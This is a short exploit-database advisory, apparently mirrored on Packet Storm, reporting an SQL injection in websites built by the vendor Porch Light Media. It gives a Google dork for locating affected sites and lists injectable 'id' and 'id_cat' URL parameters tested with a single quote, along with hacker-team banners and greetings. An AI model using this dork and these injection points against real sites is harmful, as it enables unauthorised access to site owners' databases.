Porch Light Media SQL Injection

2013-02-24T00:00:00
ID PACKETSTORM:120528
Type packetstorm
Reporter Kalashinkov3
Modified 2013-02-24T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm kalashinkov3 member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Info================================================================  
  
[-] Title : Porch Light Media SQL-i Vulnerability‏  
[-] Author: Kalashinkov3  
[-] Home : ALGERIA / 13000   
[-] Website : 1337day.com   
[-] Facebook :facebook.com/Algerian.Cyber.Army  
[-] Vendor: www.porchlightmedia.net  
[-] Email : kalashinkov3[at]Hotmail[dot]Fr  
[-] Date : 24/02/2013  
[-] Google Dork : intext:"Site by Porch Light Media"   
packetstormsecurity.org  
[-] Security Risk : Meduim  
[-] Category : webapps / 0day / SQL-i  
  
[+] Exploit===============================================================  
  
[-] SQL Injection :)  
  
# http://[localhost]/*.php?id='1  
# http://[localhost]/*.php?id=[SQLI]  
  
# http://[localhost]/*.php?id_cat='1  
# http://[localhost]/*.php?id_cat='1  
  
  
[+] Greets===================================================================+  
+   
+  
all Algerians Hacker'S ;), All My Friends +  
[ ******** ] +  
+  
=============================================================================+  
`